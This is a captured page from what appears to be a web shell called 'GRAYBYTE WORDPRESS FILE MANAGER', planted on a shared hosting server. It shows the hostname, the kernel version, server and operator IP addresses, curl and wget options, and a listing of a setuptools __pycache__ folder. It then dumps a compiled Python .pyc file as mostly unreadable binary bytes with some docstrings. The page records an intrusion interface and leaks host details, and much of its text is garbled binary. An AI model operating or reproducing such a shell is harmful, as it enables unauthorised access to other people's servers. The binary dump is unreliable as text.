✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server366.web-hosting.com ​🇻​♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.86
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/alt/python312/lib/python3.12/site-packages/setuptools/__pycache__//extension.cpython-312.pyc
�

��_i����ddlZddlZddlZddlZddlZddlmZd�ZeZ	eejj�ZGd�de�ZGd�de�Z
y)	�N�)�
get_unpatchedc�X�d}	t|dg��jy#t$rYywxYw)z0
    Return True if Cython can be imported.
    zCython.Distutils.build_ext�	build_ext)�fromlistTF)�
__import__r�	Exception)�cython_impls ��/builddir/build/BUILDROOT/alt-python312-setuptools-69.0.2-3.el8.x86_64/opt/alt/python312/lib/python3.12/site-packages/setuptools/extension.py�_have_cythonr
s8��/�K�
��;�+��7�A�A����
���
�s��	)�)c�(��eZdZdZ�fd�Zd�Z�xZS)�	Extensiona�
    Describes a single extension module.

    This means that all source files will be compiled into a single binary file
    ``<module path>.<suffix>`` (with ``<module path>`` derived from ``name`` and
    ``<suffix>`` defined by one of the values in
    ``importlib.machinery.EXTENSION_SUFFIXES``).

    In the case ``.pyx`` files are passed as ``sources and`` ``Cython`` is **not**
    installed in the build environment, ``setuptools`` may also try to look for the
    equivalent ``.cpp`` or ``.c`` files.

    :arg str name:
      the full name of the extension, including any packages -- ie.
      *not* a filename or pathname, but Python dotted name

    :arg list[str] sources:
      list of source filenames, relative to the distribution root
      (where the setup script lives), in Unix form (slash-separated)
      for portability.  Source files may be C, C++, SWIG (.i),
      platform-specific resource files, or whatever else is recognized
      by the "build_ext" command as source for a Python extension.

    :keyword list[str] include_dirs:
      list of directories to search for C/C++ header files (in Unix
      form for portability)

    :keyword list[tuple[str, str|None]] define_macros:
      list of macros to define; each macro is defined using a 2-tuple:
      the first item corresponding to the name of the macro and the second
      item either a string with its value or None to
      define it without a particular value (equivalent of "#define
      FOO" in source or -DFOO on Unix C compiler command line)

    :keyword list[str] undef_macros:
      list of macros to undefine explicitly

    :keyword list[str] library_dirs:
      list of directories to search for C/C++ libraries at link time

    :keyword list[str] libraries:
      list of library names (not filenames or paths) to link against

    :keyword list[str] runtime_library_dirs:
      list of directories to search for C/C++ libraries at run time
      (for shared extensions, this is when the extension is loaded).
      Setting this will cause an exception during build on Windows
      platforms.

    :keyword list[str] extra_objects:
      list of extra files to link with (eg. object files not implied
      by 'sources', static library that must be explicitly specified,
      binary resource files, etc.)

    :keyword list[str] extra_compile_args:
      any extra platform- and compiler-specific information to use
      when compiling the source files in 'sources'.  For platforms and
      compilers where "command line" makes sense, this is typically a
      list of command-line arguments, but for other platforms it could
      be anything.

    :keyword list[str] extra_link_args:
      any extra platform- and compiler-specific information to use
      when linking object files together to create the extension (or
      to create a new static Python interpreter).  Similar
      interpretation as for 'extra_compile_args'.

    :keyword list[str] export_symbols:
      list of symbols to be exported from a shared extension.  Not
      used on all platforms, and not generally necessary for Python
      extensions, which typically export exactly one symbol: "init" +
      extension_name.

    :keyword list[str] swig_opts:
      any extra options to pass to SWIG if a source file has the .i
      extension.

    :keyword list[str] depends:
      list of files that the extension depends on

    :keyword str language:
      extension language (i.e. "c", "c++", "objc"). Will be detected
      from the source extensions if not provided.

    :keyword bool optional:
      specifies that a build failure in the extension should not abort the
      build process, but simply not install the failing extension.

    :keyword bool py_limited_api:
      opt-in flag for the usage of :doc:`Python's limited API <python:c-api/stable>`.

    :raises setuptools.errors.PlatformError: if 'runtime_library_dirs' is
      specified on Windows. (since v63)
    c�\��|jdd�|_t�|�||g|��i|��y)N�py_limited_apiF)�popr�super�__init__)�self�name�sources�args�kw�	__class__s     �rrzExtension.__init__~s2���!�f�f�%5�u�=���
����w�4��4��4�c��t�ry|jxsd}|j�dk(rdnd}tjt
jd|�}tt||j��|_	y)z�
        Replace sources with .pyx extensions to sources with the target
        language extension. This mechanism allows language authors to supply
        pre-converted sources but to prefer the .pyx sources.
        N�zc++z.cppz.cz.pyx$)
r�language�lower�	functools�partial�re�sub�list�mapr)r�lang�
target_extr"s    r�_convert_pyx_sources_to_langz&Extension._convert_pyx_sources_to_lang�s]���>���}�}�"���#�z�z�|�u�4�V�$�
���������<���C��T�\�\�2�3��r)�__name__�
__module__�__qualname__�__doc__rr'�
__classcell__)rs@rrrs���]�~5�4rrc��eZdZdZy)�Libraryz=Just like a regular Extension, but built as a library insteadN)r(r)r*r+�rrr.r.�s��Grr.)r!r�distutils.core�	distutils�distutils.errors�distutils.extension�monkeyrr�
have_pyrex�corer�
_Extensionr.r/rr�<module>r8sT��	�����!���
�
�9�>�>�3�3�
4�
�r4�
�r4�jH�i�Hr


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
10 Feb 2026 6.04 AM
root / linksafe
0755
__init__.cpython-312.pyc
12.286 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
_core_metadata.cpython-312.pyc
12.017 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
_entry_points.cpython-312.pyc
4.614 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
_imp.cpython-312.pyc
3.539 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
_importlib.cpython-312.pyc
1.803 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
_itertools.cpython-312.pyc
1.1 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
_normalization.cpython-312.pyc
5.848 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
_path.cpython-312.pyc
1.945 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
_reqs.cpython-312.pyc
1.874 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
archive_util.cpython-312.pyc
8.979 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
build_meta.cpython-312.pyc
22.892 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
dep_util.cpython-312.pyc
0.902 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
depends.cpython-312.pyc
7.306 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
discovery.cpython-312.pyc
28.442 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
dist.cpython-312.pyc
44.102 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
errors.cpython-312.pyc
3.421 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
extension.cpython-312.pyc
6.373 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
glob.cpython-312.pyc
5.895 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
installer.cpython-312.pyc
6.354 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
launch.cpython-312.pyc
1.326 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
logging.cpython-312.pyc
2.053 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
modified.cpython-312.pyc
0.391 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
monkey.cpython-312.pyc
6.366 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
msvc.cpython-312.pyc
59.106 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
namespaces.cpython-312.pyc
5.176 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
package_index.cpython-312.pyc
51.399 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
py312compat.cpython-312.pyc
0.853 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
sandbox.cpython-312.pyc
23.168 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
unicode_utils.cpython-312.pyc
1.652 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
version.cpython-312.pyc
0.465 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
warnings.cpython-312.pyc
4.882 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
wheel.cpython-312.pyc
13.143 KB
8 Jan 2026 6.42 PM
root / linksafe
0644
windows_support.cpython-312.pyc
1.468 KB
8 Jan 2026 6.42 PM
root / linksafe
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF